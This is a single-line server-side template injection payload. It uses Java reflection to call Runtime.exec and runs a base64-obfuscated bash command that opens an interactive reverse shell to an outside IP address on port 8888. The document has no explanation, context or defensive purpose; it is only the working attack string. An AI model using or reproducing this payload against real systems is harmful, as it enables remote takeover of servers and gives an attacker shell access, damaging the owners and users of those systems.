$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC81Mi4xOTYuMjMzLjExNS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}').waitFor() 
